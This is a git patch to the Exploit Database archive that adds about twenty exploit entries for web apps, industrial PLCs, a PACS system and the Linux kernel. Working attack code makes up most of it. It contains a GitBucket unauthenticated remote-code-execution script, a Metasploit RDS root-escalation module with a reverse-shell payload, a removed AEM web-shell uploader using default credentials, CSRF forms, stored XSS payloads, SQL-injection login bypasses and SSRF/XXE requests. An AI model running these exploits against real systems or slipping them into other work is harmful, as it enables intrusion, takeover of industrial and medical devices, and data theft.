From 08c35595edb02c96567d09382f3d1593308317f9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 May 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-05-22 23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting --- exploits/hardware/webapps/44671.html | 53 ++++++ exploits/hardware/webapps/44672.txt | 118 ++++++++++++++ exploits/hardware/webapps/44675.html | 50 ++++++ exploits/hardware/webapps/44676.html | 48 ++++++ exploits/java/webapps/44666.txt | 35 ++++ exploits/java/webapps/44668.py | 171 ++++++++++++++++++++ exploits/jsp/webapps/44659.py | 56 ------- exploits/linux/local/44677.rb | 187 ++++++++++++++++++++++ exploits/linux/webapps/44667.txt | 15 ++ exploits/linux/webapps/44681.txt | 39 +++++ exploits/php/webapps/44661.txt | 57 +++++++ exploits/php/webapps/44662.txt | 18 +++ exploits/php/webapps/44663.txt | 34 ++++ exploits/php/webapps/44664.txt | 41 +++++ exploits/php/webapps/44679.txt | 52 ++++++ exploits/php/webapps/44682.txt | 56 +++++++ exploits/php/webapps/44683.txt | 12 ++ exploits/windows/webapps/44678.txt | 103 ++++++++++++ exploits/windows_x86/local/44680.py | 132 +++++++++++++++ exploits/{linux => xml}/webapps/44430.txt | 0 files_exploits.csv | 21 ++- 21 files changed, 1240 insertions(+), 58 deletions(-) create mode 100644 exploits/hardware/webapps/44671.html create mode 100644 exploits/hardware/webapps/44672.txt create mode 100644 exploits/hardware/webapps/44675.html create mode 100644 exploits/hardware/webapps/44676.html create mode 100644 exploits/java/webapps/44666.txt create mode 100755 exploits/java/webapps/44668.py delete mode 100755 exploits/jsp/webapps/44659.py create mode 100755 exploits/linux/local/44677.rb create mode 100644 exploits/linux/webapps/44667.txt create mode 100644 exploits/linux/webapps/44681.txt create mode 100644 exploits/php/webapps/44661.txt create mode 100644 exploits/php/webapps/44662.txt create mode 100644 exploits/php/webapps/44663.txt create mode 100644 exploits/php/webapps/44664.txt create mode 100644 exploits/php/webapps/44679.txt create mode 100644 exploits/php/webapps/44682.txt create mode 100644 exploits/php/webapps/44683.txt create mode 100644 exploits/windows/webapps/44678.txt create mode 100755 exploits/windows_x86/local/44680.py rename exploits/{linux => xml}/webapps/44430.txt (100%) diff --git a/exploits/hardware/webapps/44671.html b/exploits/hardware/webapps/44671.html new file mode 100644 index 000000000..157d82062 --- /dev/null +++ b/exploits/hardware/webapps/44671.html @@ -0,0 +1,53 @@ + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44672.txt b/exploits/hardware/webapps/44672.txt new file mode 100644 index 000000000..53fb392d7 --- /dev/null +++ b/exploits/hardware/webapps/44672.txt @@ -0,0 +1,118 @@ +Teradek VidiU Pro 3.0.3 SSRF Vulnerability + + +Vendor: Teradek, LLC +Product web page: https://www.teradek.com +Affected version: VidiU, VidiU Mini, VidiU Pro + 3.0.3r32136 + 3.0.2r31225 + 2.4.10 + +Summary: The Teradek VidiU gives you the freedom to broadcast live +high definition video directly to the Web without a PC. Whether you're +streaming out of a video switcher or wirelessly from your camera, +VidiU allows you to go live when you want, where you want. VidiU +offers API level integration with the Ustream, YouTube Live and +Livestream platforms, which makes streaming to your channel as +easy as logging into your account. + +Desc: A server-side request forgery (SSRF) vulnerability exists in +the VidiU management interface within the RTMP settings and the Wowza +server mode functionality. The application parses user supplied data +in the GET parameters 'url' and 'xml_url' to construct a page request +that loads the configuration for specific service. Since no validation +is carried out on the parameters, an attacker can specify an external +domain and force the application to make a HTTP request to an arbitrary +destination host, including xml data parsing (XXE potential). This can +be used by an external attacker for example to bypass firewalls and +initiate a service and network enumeration on the internal network +through the affected application. + +Tested on: lighttpd/1.4.48 + lighttpd/1.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5461 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php + + +02.03.2018 + +-- + + +SSRF open port: +--------------- + +GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1 +Host: 127.0.0.1:8090 + + +HTTP/1.1 200 OK +Content-Type: application/json +Connection: close +Date: Sun, 13 May 2018 21:42:30 GMT +Server: lighttpd/1.4.31 +Content-Length: 31 + +{"error":"invalid parameters"} + + +SSRF closed port: +----------------- + +GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1 +Host: 127.0.0.1:8090 + + +HTTP/1.1 200 OK +Content-Length: 0 +Connection: close +Date: Sun, 13 May 2018 21:43:30 GMT +Server: lighttpd/1.4.31 + + +=================================================== + + +SSRF closed port: +----------------- + +GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1 +Host: 127.0.0.1:8090 + + +{"result":"error", "error":"Curl error"} + + +SSRF open port: +--------------- + +GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1 +Host: 127.0.0.1:8090 + + +{"result":"error", "error":"Bad request"} + + +=================================================== + + +PoC CSRF Blind XXE SSRF OOB: +---------------------------- + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44675.html b/exploits/hardware/webapps/44675.html new file mode 100644 index 000000000..f8afecad5 --- /dev/null +++ b/exploits/hardware/webapps/44675.html @@ -0,0 +1,50 @@ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44676.html b/exploits/hardware/webapps/44676.html new file mode 100644 index 000000000..44ad6f96a --- /dev/null +++ b/exploits/hardware/webapps/44676.html @@ -0,0 +1,48 @@ + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/java/webapps/44666.txt b/exploits/java/webapps/44666.txt new file mode 100644 index 000000000..294828581 --- /dev/null +++ b/exploits/java/webapps/44666.txt @@ -0,0 +1,35 @@ +# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting +# Dated: 2018-03-31 +# Exploit Author: Ahmet GÜREL +# Software Link: https://www.manageengine.com/ad-recovery-manager/ +# Version: < = 5.3 (Build 5330) +# Platform: Java +# Tested on: Windows +# CVE: CVE-2018-9163 + +# 1. DETAILS +# In the Add New Technician (s) section on the /admin/technicians page of the +# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows +# remote authenticated users with the Login Name parameter is vulnerable to +# XSS. The parameters entered are written in the database and affect all +# users. + +# 2. PoC: +# From the Add New Technician (s) page, it is possible to inject malicious +# web code inside Login Name parameter. The HTTP request looks like the following: + +GET +/technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22} +HTTP/1.1 +Host: 172.16.219.168:8090 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) +Gecko/20100101 Firefox/59.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://172.16.219.168:8090/ +Content-Type: application/json; charset=utf-8 +X-Requested-With: XMLHttpRequest +Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A; +JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D +Connection: close \ No newline at end of file diff --git a/exploits/java/webapps/44668.py b/exploits/java/webapps/44668.py new file mode 100755 index 000000000..05313de7f --- /dev/null +++ b/exploits/java/webapps/44668.py @@ -0,0 +1,171 @@ +# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE +# Date: 21-05-2018 +# Software Link: https://github.com/gitbucket/gitbucket +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: remote + +1. Description + +Abusing weak secret token and passing insecure parameter to File function. + +2. Proof of Concept + +import os +try: + from Crypto.Cipher import Blowfish +except: + print "pip install pycrypto" + os._exit(0) + +import binascii +import base64 +import urllib2 +import urllib +import time +import sys +import pickle + +print "GitBucket 4.23.1 Unauthenticated RCE" +print "by Kacper Szurek" +print "https://security.szurek.pl/" + +print "Working only when server is installed on Windows" + +def PKCS5Padding(string): + byteNum = len(string) + packingLength = 8 - byteNum % 8 + appendage = chr(packingLength) * packingLength + return string + appendage + +def encrypt(content, key): + content = PKCS5Padding(content) + cipher = Blowfish.new(key, Blowfish.MODE_ECB) + return base64.b64encode(cipher.encrypt(content)) + +def get_file(git_bucket_url, file, key, expiration_time): + payload = "{} {}".format(expiration_time, file) + authorization = encrypt(payload, key) + url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file) + + try: + request = urllib2.Request(url) + request.add_header("Authorization", authorization) + result = urllib2.urlopen(request).read() + return result + + except Exception, e: + # If payload is correct and file does not exist, we got error 400 + if not "Error 500" in e.read(): + return 'OK' + +def put_file(git_bucket_url, file, key, expiration_time, content): + payload = "{} {}".format(expiration_time, file) + authorization = encrypt(payload, key) + url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file) + + try: + request = urllib2.Request(url, data=content) + request.add_header("Authorization", authorization) + request.get_method = lambda: 'PUT' + result = urllib2.urlopen(request) + return result.getcode() == 200 + + except Exception, e: + return None + +def send_command(git_bucket_url, command): + try: + result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read() + return result + except: + return None + +def pickle_key(url, key): + output = open(pickle_path, "wb") + pickle.dump({'url' : url, 'key' : key}, output) + output.close() + print "[+] Key pickled for futher use" + + +def unpickle_key(url): + if os.path.isfile(pickle_path): + pickled_file = open(pickle_path, "rb") + data = pickle.load(pickled_file) + pickled_file.close() + if data['url'] == url: + return data['key'] + return None + +if len(sys.argv) != 3: + print "[-] Usage: exploit.py url command" + os._exit(0) + + +exploit_jar = 'exploit.jar' +url = sys.argv[1] +command = sys.argv[2] +pickle_path = 'gitbucket.pickle' + +if url.endswith('/'): + url = url[0:-1] + +try: + is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read() +except: + is_gitbucket = "" + +if not is_gitbucket.startswith('{"rate_limit_url"'): + print "[-] Probably not gitbucket url: {}".format(url) + os._exit(0) + +if not os.path.isfile(exploit_jar): + print "[-] Missing exploit file: {}".format(exploit_jar) + os._exit(0) + +expiration_time = int(round(time.time() * 1000))+(1000*6000) +print "[+] Set expire time to: {}".format(expiration_time) + +print "[+] Start search blowfish key: " +for i in range(0, 10000): + if i % 100 == 0: + print "+", + + potential_key = unpickle_key(url) + if potential_key: + print "\n[+] Unpickle key, try it" + else: + potential_key = str(i).zfill(4) + + config_path = "non_existing_file" + config_content = get_file(url, config_path, potential_key, expiration_time) + if config_content: + print "\n[+] Found blowfish key: {}".format(potential_key) + print "[+] Config content:\n{}".format(config_content) + + exploit_path = "..\..\..\..\plugins\exploit.jar" + f = open(exploit_jar, "rb") + exploit_content = f.read() + f.close() + if put_file(url, exploit_path, potential_key, expiration_time, exploit_content): + print "[+] Wait few second for plugin load" + time.sleep(5) + command_content = send_command(url, "cmd /c {}".format(command)) + + if command_content: + pickle_key(url, potential_key) + print command_content + else: + print "[-] Cannot execute command" + + else: + print "[-] Cannot upload exploit.jar" + + os._exit(0) + +3. Solution: + +Update to version 4.24.1 + +https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war \ No newline at end of file diff --git a/exploits/jsp/webapps/44659.py b/exploits/jsp/webapps/44659.py deleted file mode 100755 index 25547dc5f..000000000 --- a/exploits/jsp/webapps/44659.py +++ /dev/null @@ -1,56 +0,0 @@ -# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE -# Date: 5/19/18 -# Exploit Author: StaticFlow -# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html -# Version: < 6.3 -import requests -import sys - -baseUrl = 'https://test.com/' #default domain, change here or pass in on command line -credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']] -exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line - -def testLogins(): - for credential in credentialList: - response = requests.get(baseUrl, auth=(credential[0], credential[1])) - if(response.status_code == 200): - return credential - return False - -if len(sys.argv) == 2: - baseUrl = sys.argv[1] -if len(sys.argv) == 3: - exploit = sys.argv[2] - -gotCreds = testLogins() -if(gotCreds): - attackChain = [ - { - 'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit - }, - { - 'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit - }, - { - ':operation': (None, 'copy'), #copy exploit folder over to app folder for staging - ':dest': (None, '/apps/rcetype') - }, - { - 'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet - } - ] - print "creating folder structure and uploading exploit" - for attack in attackChain[:-1]: - response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1])) - if response.status_code > 201: - print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:" - print response.content - sys.exit(0) - - print "initializing servlet from exploit" - response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1])) - if response.status_code > 201: - print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:" - print response.content - sys.exit(0) - print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec') \ No newline at end of file diff --git a/exploits/linux/local/44677.rb b/exploits/linux/local/44677.rb new file mode 100755 index 000000000..a672bb5bf --- /dev/null +++ b/exploits/linux/local/44677.rb @@ -0,0 +1,187 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation', + 'Description' => %q{ + This module exploits a vulnerability in the rds_page_copy_user function + in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 + to execute code as root (CVE-2010-3904). + + This module has been tested successfully on Fedora 13 (i686) with + kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) + with kernel version 2.6.32-21-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Dan Rosenberg', # Discovery and C exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 20 2010', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'rds-fail.c' ], + [ 'EDB', '15285' ], + [ 'CVE', '2010-3904' ], + [ 'BID', '44219' ], + [ 'URL', 'https://securitytracker.com/id?1024613' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ], + [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ], + [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ], + [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ], + ], + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'WfsDelay' => 10, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def modules_disabled? + modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip + (modules_disabled.eql?('1') || modules_disabled.eql?('2')) + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + output = cmd_exec "gcc -o #{path} #{path}.c" + + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + register_file_for_cleanup path + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') && + Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37') + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} appears to be vulnerable" + + unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets' + vprint_error 'RDS kernel module is not available' + return CheckCode::Safe + end + vprint_good 'RDS kernel module is available' + + if modules_disabled? + unless cmd_exec('/sbin/lsmod').to_s.include? 'rds' + vprint_error 'RDS kernel module is not loadable' + return CheckCode::Safe + end + end + vprint_good 'RDS kernel module is loadable' + + CheckCode::Appears + end + + def exploit + unless check == CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('rds-fail.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + arch = kernel_hardware + case arch + when /amd64|ia64|x86_64|x64/i + upload_and_chmodx executable_path, exploit_data('rds-fail.x64') + when /x86|i[3456]86/ + upload_and_chmodx executable_path, exploit_data('rds-fail.x86') + else + fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}" + end + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec "#{executable_path} #{payload_path}" + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44667.txt b/exploits/linux/webapps/44667.txt new file mode 100644 index 000000000..45e8e0045 --- /dev/null +++ b/exploits/linux/webapps/44667.txt @@ -0,0 +1,15 @@ +# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-21 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3 +# Tested on: Kali Linux +# CVE: CVE-2015- 5698 + +# 1. Proof of Concept + +
+ + +
\ No newline at end of file diff --git a/exploits/linux/webapps/44681.txt b/exploits/linux/webapps/44681.txt new file mode 100644 index 000000000..4dd7c045b --- /dev/null +++ b/exploits/linux/webapps/44681.txt @@ -0,0 +1,39 @@ +# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery +# Google Dork: - +# Date: 2018-05-21 +# Exploit Author: Safak Aslan +# Vendor Homepage: http://www.merge.com/ +# Version: Merge PACS 7.0 +# Tested on: Windows +# CVE: - + +# 1. Proof of Concept + + + + +
+ + + + +
+ + + +Post Data: + +POST /servlet/actions/merge-viewer/summary HTTP/1.1 +Host: targetIP +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D +Connection: close +Upgrade-Insecure-Requests: 1 + +amicasUsername=merge&password=viewer&submitButton=Login \ No newline at end of file diff --git a/exploits/php/webapps/44661.txt b/exploits/php/webapps/44661.txt new file mode 100644 index 000000000..2cd1810c1 --- /dev/null +++ b/exploits/php/webapps/44661.txt @@ -0,0 +1,57 @@ +# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass +# Date: 2018-05-20 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30 +# Version: 1.0 +# Tested on: Kali linux +==================================================== +# Description: +Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities : +==================================================== +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . +==================================================== +# POC 2 : CSRF : +Attacker can change user's authentication directly : +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
+ +==================================================== +# POC 3 : Authentication bypass : +# Attacker can bypass admin panel without any authentication : +Path : /admin +Username : ' or 0=0 # +Password : anything +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44662.txt b/exploits/php/webapps/44662.txt new file mode 100644 index 000000000..b45886e7c --- /dev/null +++ b/exploits/php/webapps/44662.txt @@ -0,0 +1,18 @@ +# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting +# Date: 2018-05-20 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1 +# Version: 2.0 +# Tested on: Windows + +# Description : +Private Message PHP Script 2.0 suffers from persistent cross site scripting. +You can put your malicious javascript payload . +When target opens your massege , payload will be executed before self destruction . + +# POC : +1) Put this payload into textarea and click submit : + + +2) You will get a link which your javascript code is inside this link . You can send this link to anyone . +3) After clicking on "show me the message" , payload will be executed . \ No newline at end of file diff --git a/exploits/php/webapps/44663.txt b/exploits/php/webapps/44663.txt new file mode 100644 index 000000000..b8f1fd524 --- /dev/null +++ b/exploits/php/webapps/44663.txt @@ -0,0 +1,34 @@ +# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery +# Date: 2018-05-20 +# Dork: N/A +# Exploit Author: borna nematzadeh (L0RD) +# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630 +# Version: 1.1.0 +# Tested on: Kali linux + +# POC 1 : Persistent Cross site scripting : +1) After creating an account , navigate to "Edit profile" . +2) Put this payload into the "Birthday" and save changes : +" onmouseover=alert(document.cookie) " +3) You will have an alert box in the page . + +# POC 2 : Cross site request forgery : + + + + CSRF POC + + +
+ + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44664.txt b/exploits/php/webapps/44664.txt new file mode 100644 index 000000000..119a8d5f5 --- /dev/null +++ b/exploits/php/webapps/44664.txt @@ -0,0 +1,41 @@ +# Exploit Title: Zenar Content Management System - Cross-Site Scripting +# Software Link: https://zenar.io/ +# Dork: N/A +# Author: Berk Dusunur +# Tested Website: http://demo.zenar.io +# Date: 2018-05-20 +# Category: Web App + +# PoC + +# GET Request: + +POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1 +Host: demo.zenar.io +Cache-Control: no-cache +Connection: Keep-Alive +Accept: text/plain, */*; q=0.01 +Origin: http://demo.zenar.io +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 +X-Requested-With: XMLHttpRequest +Referer: http://demo.zenar.io/enquiries/newsletter-sign-up +Accept-Language: en-us,en;q=0.5 +X-Scanner: Netsparker +Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33 +Accept-Encoding: gzip, deflate +Content-Length: 273 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com¤t_page='"--> + +# Response: + +
" +class="page_">
\ No newline at end of file diff --git a/exploits/php/webapps/44679.txt b/exploits/php/webapps/44679.txt new file mode 100644 index 000000000..d481b4429 --- /dev/null +++ b/exploits/php/webapps/44679.txt @@ -0,0 +1,52 @@ +# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28 +# Version: 1.0 +# Tested on: Kali linux + +# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities: + +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . + +# POC 2 : CSRF : +# Attacker can change user's authentication directly : +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
+ + +# POC 3 : Authentication bypass : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44682.txt b/exploits/php/webapps/44682.txt new file mode 100644 index 000000000..2296eb06c --- /dev/null +++ b/exploits/php/webapps/44682.txt @@ -0,0 +1,56 @@ +# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29 +# Version: 1.0 +# Tested on: Kali linux + +# Description: +#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities : + +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . + +# POC 2 : CSRF : cross site request forgery : + +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
+ + +# POC 3 : Authentication bypass : +# Attacker can bypass admin panel without any authentication : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44683.txt b/exploits/php/webapps/44683.txt new file mode 100644 index 000000000..77de3620d --- /dev/null +++ b/exploits/php/webapps/44683.txt @@ -0,0 +1,12 @@ +# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - Persistent cross site scripting +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327 +# Version: 1.5 +# Tested on: Windows + +# POC : +1) Create your account and navigate to "Edit profile" +2) Put this payload into textarea : + +3) The payload will be executed if someone opens your profile . \ No newline at end of file diff --git a/exploits/windows/webapps/44678.txt b/exploits/windows/webapps/44678.txt new file mode 100644 index 000000000..c0a03ff55 --- /dev/null +++ 